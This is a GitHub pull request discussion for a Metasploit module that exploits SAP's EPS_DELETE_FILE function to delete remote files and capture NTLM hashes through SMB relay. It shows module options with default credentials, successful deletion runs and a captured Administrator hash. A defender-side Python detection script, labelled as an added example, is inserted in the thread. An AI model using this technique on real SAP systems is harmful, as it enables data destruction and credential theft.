EPS_DELETE_FILE (File Deletion and SMB Relay) #1659

Merged
merged 1 commit into from May 9, 2013


@nmonkee

A vulnerability in the SAP EPS_DELETE_FILE RFC function allows an attacker to delete files remotely and/or steal hashes using an SMB relay attack.

SAP Note 1554030 / DSECRG-11-031.

ref: http://dsecrg.com/pages/vul/show.php?id=331

@jvazquez-r7 jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework May 6, 2013
Merged

Cleanup for sap_soap_rfc_eps_delete_file #7

@jvazquez-r7

Hi @nmonkee,

The pull request nmonkee#7 applies the same changes proposed in the last pull requests such as #1658, plus it moves the module to the "dos" tree, because a file deletion module is a dos module indeed. Even when it also helps to make SMBRelay attacks, that can also be done by other auxiliary scanner modules, so I think auxiliary/dos/sap is the correct place for this module. As always feel free to review, test, ask, discuss anything and merge nmonkee#7 on your repo when ready. So this pull request will be automatically updated and we'll be ready to merge :)

Testing after changes:

msf auxiliary(sap_soap_rfc_eps_delete_file) > show options

Module options (auxiliary/dos/sap/sap_soap_rfc_eps_delete_file):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       SAP Client
   DIRNAME   /tmp             yes       Directory Path which contains the file to delete
   FILENAME  msf.txt          yes       Filename to delete
   PASSWORD  06071992         yes       Password
   Proxies                    no        Use a proxy chain
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     80               yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host

msf auxiliary(sap_soap_rfc_eps_delete_file) > run

[+] 192.168.172.179:8042 - File msf.txt at /tmp successfully deleted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@nmonkee

Not that I am that fussed, but it seems that this error is received and the file is not deleted on Linux and Windows. However, that makes it an ineffective DoS module ;)


<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>SOAP-ENV:Client</faultcode><faultstring>DELETE_FAILED</faultstring><detail><rfc:EPS_DELETE_FILE.Exception xmlns:rfc="urn:sap-com:document:sap:rfc:functions"><Name>DELETE_FAILED</Name></rfc:EPS_DELETE_FILE.Exception></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>

SMB Relay works fine:


msf auxiliary(sap_soap_rfc_eps_delete_file) > run
[*] 192.168.1.86:8000 - Sending request to delete msf.txt at \\192.168.1.71\foo
[*] SMB Captured - 2013-05-09 21:20:07 +0100
NTLMv1 Response Captured from 192.168.1.86:50768 - 192.168.1.86 
USER:Administrator DOMAIN:GATEWAY OS: LM:
LMHASH:Disabled 
NTHASH:d9d3c192407bc93152376e16d6a3a3fa9aa53b3cf940f8d4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
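A defender-side triage of the exchange in this comment, added here as an example (not the module's code and not part of the PR): it parses the fault response quoted above and flags a request whose DIRNAME is a UNC path, the pattern behind the SMB capture shown. The SOAP request layout (an EPS_DELETE_FILE element in the urn:sap-com:document:sap:rfc:functions namespace with DIRNAME and FILENAME children) is an assumption.

```python
import re
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
RFC_NS = "urn:sap-com:document:sap:rfc:functions"
# A \\host\share DIRNAME makes the SAP host open an SMB session to "host":
# that is the hash-capture / relay indicator a detection should alert on.
UNC_RE = re.compile(r"^\\\\[^\\]+")


def triage(xml_text: str) -> dict:
    """Classify one SOAP message seen on the EPS_DELETE_FILE RFC endpoint."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    body = root.find(f"{{{SOAP_ENV}}}Body")
    if body is None:
        return {"kind": "unknown"}
    fault = body.find(f"{{{SOAP_ENV}}}Fault")
    if fault is not None:  # response: the RFC raised an exception
        return {"kind": "fault",
                "faultstring": (fault.findtext("faultstring") or "").strip(),
                "exception": (fault.findtext(".//Name") or "").strip()}
    call = body.find(f"{{{RFC_NS}}}EPS_DELETE_FILE")
    if call is None:
        return {"kind": "other"}
    dirname = (call.findtext("DIRNAME") or "").strip()
    return {"kind": "request", "dirname": dirname,
            "filename": (call.findtext("FILENAME") or "").strip(),
            "unc_target": bool(UNC_RE.match(dirname))}


# Fault response as quoted in the PR discussion above.
FAULT_RESPONSE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
    ' xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body>'
    '<SOAP-ENV:Fault><faultcode>SOAP-ENV:Client</faultcode>'
    '<faultstring>DELETE_FAILED</faultstring><detail>'
    '<rfc:EPS_DELETE_FILE.Exception xmlns:rfc="urn:sap-com:document:sap:rfc:functions">'
    '<Name>DELETE_FAILED</Name></rfc:EPS_DELETE_FILE.Exception></detail>'
    '</SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>')


def _request(dirname: str, filename: str) -> str:
    """Constructed request body; element layout is assumed, not taken from the PR."""
    return (f'<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_ENV}"><SOAP-ENV:Body>'
            f'<rfc:EPS_DELETE_FILE xmlns:rfc="{RFC_NS}"><DIRNAME>{dirname}</DIRNAME>'
            f'<FILENAME>{filename}</FILENAME></rfc:EPS_DELETE_FILE>'
            '</SOAP-ENV:Body></SOAP-ENV:Envelope>')


RELAY_REQUEST = _request(r"\\192.168.1.71\foo", "msf.txt")  # UNC path from the capture above
LOCAL_REQUEST = _request("/tmp", "msf.txt")                  # plain local deletion
```

Run `triage()` over request bodies logged at the SAP web stack to separate plain deletions from UNC-path requests that trigger an outbound SMB session.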
@jvazquez-r7

No, it's important, checking....

@nmonkee

A search on the error suggests case sensitivity is important.

@jvazquez-r7

Working as expected when the owner of the file to delete is npladm

msf auxiliary(sap_soap_rfc_eps_delete_file) > run

[*] 192.168.172.179:8042 - Sending request to delete w00t at /tmp/
[+] 192.168.172.179:8042 - File w00t at /tmp/ successfully deleted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

merging!

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request May 9, 2013
jvazquez-r7 Land #1659, @nmonkee's sap_soap_rfc_eps_delete_file module 3e1d1a3
@jvazquez-r7 jvazquez-r7 merged commit 7ad73d8 into rapid7:master May 9, 2013

1 check passed: the Travis CI build passed.
@nmonkee nmonkee deleted the nmonkee:sap_soap_rfc_eps_delete_file_smb_relay branch May 9, 2013
@jvazquez-r7

Checking on windows!

@jvazquez-r7

Fixed the error on windows:

msf auxiliary(sap_soap_rfc_eps_delete_file) > reload
[*] Reloading module...
msf auxiliary(sap_soap_rfc_eps_delete_file) > run

[*] 192.168.172.185:8000 - Sending request to delete foo.txt at c:\
[+] 192.168.172.185:8000 - File foo.txt at c:\ successfully deleted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

See: d37d211
